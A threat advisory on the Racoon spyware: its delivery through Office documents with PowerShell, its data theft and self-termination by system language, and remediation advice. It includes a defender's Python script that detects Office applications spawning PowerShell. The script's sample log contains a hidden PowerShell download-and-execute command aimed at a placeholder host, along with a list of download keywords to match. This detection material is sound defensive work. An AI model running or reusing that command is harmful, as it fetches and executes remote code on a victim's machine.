Racoon Spyware

Racoon is a new malware-as-a-service (MaaS) spyware offered through a number of dark web forums.

Affected platforms

The following platforms are known to be affected:

Threat details

Despite being first detected only in April 2019, Racoon has quickly risen to become one of the most frequently observed malware families, owing to a combination of low cost, ease of use, and 24/7 support for its operators.

As with most MaaS tools, Racoon can be delivered through a number of vectors chosen by its operators. At the time of publication, it has been distributed via spam and phishing campaigns, exploit kits, compromised third-party applications, and supply chain compromises. Racoon is supplied to operators as a malicious Microsoft Office document containing a number of PowerShell scripts; when the document is opened, these scripts connect to a command and control (C2) server and download the Racoon payload.

Once installed, Racoon first checks the system language and terminates itself if Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik, or Uzbek is detected. It then collects system and user information and sends it to a separate C2 server before awaiting further commands. Racoon is able to extract information from cache files, web browsers, mail clients, and cryptocurrency wallets, as well as capturing audio and video from the webcam.
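The delivery chain described above (an Office document whose embedded PowerShell fetches the payload from a C2 server) leaves a recognisable trace in process-creation telemetry: an Office application as the parent of a PowerShell process whose command line contains a download primitive. The script below is an added example written for this advisory, not tooling from the original page or from any vendor; it scans a few constructed Sysmon-style event lines and flags that parent/child pairing, with a second marker when the command line also shows a network download. Field names (`ParentImage`, `Image`, `CommandLine`), the `|`-separated record format and all sample values are assumptions made for the example.

```python
"""Flag process-creation events where a Microsoft Office application spawns
PowerShell, optionally with a download primitive on the command line.
All log lines here are constructed for the example (Sysmon-style fields)."""
import re
from dataclasses import dataclass

# Office parents and shell children to pair up (assumed set, extend for your estate).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that indicate a download stage: a defender's heuristic,
# not an exhaustive list, and matched case-insensitively.
DOWNLOAD_MARKERS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    line_no: int   # 1-based index of the offending record
    parent: str    # parent image basename, lower-cased
    child: str     # child image basename, lower-cased
    reason: str    # "office-spawned-powershell" plus "+network-download" if seen


def parse_event(line):
    """Parse a '|'-separated 'Key=Value' record into a dict with lower-cased keys."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan(lines):
    """Return a Finding for every record where an Office parent launched PowerShell."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        parent = basename(ev.get("parentimage", ""))
        child = basename(ev.get("image", ""))
        cmd = ev.get("commandline", "")
        if parent in OFFICE_PARENTS and child in SHELLS:
            reason = "office-spawned-powershell"
            if DOWNLOAD_MARKERS.search(cmd):
                reason += "+network-download"
            findings.append(Finding(n, parent, child, reason))
    return findings


# Constructed sample telemetry: line 1 and line 3 should be flagged, 2 and 4 should not.
SAMPLE_LOG = [
    "EventID=1|ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2.ps1')",
    "EventID=1|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell Get-ChildItem C:\\Users\\alice\\Documents",
    "EventID=1|ParentImage=C:\\Program Files\\Microsoft Office\\EXCEL.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA=",
    "EventID=1|ParentImage=C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE"
    "|Image=C:\\Program Files\\Microsoft Office\\WINWORD.EXE"
    "|CommandLine=WINWORD.EXE /n invoice.docx",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.parent} -> {f.child} [{f.reason}]")
```

In production the same logic would run over the Sysmon Event ID 1 or EDR process-creation feed rather than a list of strings; the third sample shows why the parent/child pairing alone is worth alerting on, since an encoded command line carries no download keyword for the regex to match.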


Remediation steps

To prevent and detect an infection, ensure that:

  • A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
  • All operating systems, anti-virus and other security products are kept up-to-date.
  • Regular anti-virus and security scans are performed on your organisation’s estate.
  • All day-to-day computer activities such as email and internet are performed using non-administrative accounts.
  • Strong password policies are in place.
  • Network, proxy and firewall logs are monitored for suspicious activity.
  • User accounts accessed from affected devices are reset from a clean computer.
  • Your organisation adopts a holistic all-round approach to Cyber Security as advocated by the 10 Steps to Cyber Security.

Last edited: 14 February 2020 2:56 pm